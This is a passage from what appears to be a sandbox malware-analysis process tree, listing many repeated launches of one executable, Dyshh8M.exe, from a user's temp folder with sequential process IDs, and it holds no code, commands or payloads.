        PID:5944
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5952
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5960
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5968
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5976
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5984
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5992
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6000
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6008
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6016
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6024
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6032
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6040
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6048
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6056
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6064
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6072
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6080
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6088
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6096
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6104
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6112
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6120
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6128
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6136
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3216
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3292
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3056
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3472
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2652
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4320
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4436
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4372
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:4976
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2884
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:1580
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:2544
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:3236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6152
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6160
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6168
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6176
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6184
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6192
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6204
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6212
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6220
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6244
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6252
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6260
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6268
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6276
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6284
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6292
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6300
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6308
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6316
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6324
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6332
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6340
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6348
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6356
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6368
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6376
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6384
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6392
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6400
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6408
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6416
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6428
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6436
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6452
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6460
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6468
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6476
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6492
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6500
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6512
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6524
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6532
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6540
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6548
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6556
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6564
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6576
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6584
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6592
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6600
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6608
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6616
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6624
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6632
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6640
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6648
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6656
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6664
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6672
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6680
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6688
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6696
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6704
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6712
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6720
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6728
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6736
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6744
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6752
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6760
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6768
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6776
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6784
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6792
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6800
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6808
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6816
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6824
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6832
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6844
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6852
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6860
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6868
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6876
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6884
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6892
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6900
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6912
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6920
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6928
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6936
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6944
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6952
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6960
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6968
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6976
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6984
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:6996
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7004
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7012
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7020
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7028
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7036
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7044
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7052
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7060
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7068
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7076
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7084
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7092
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7100
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7116
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:7132
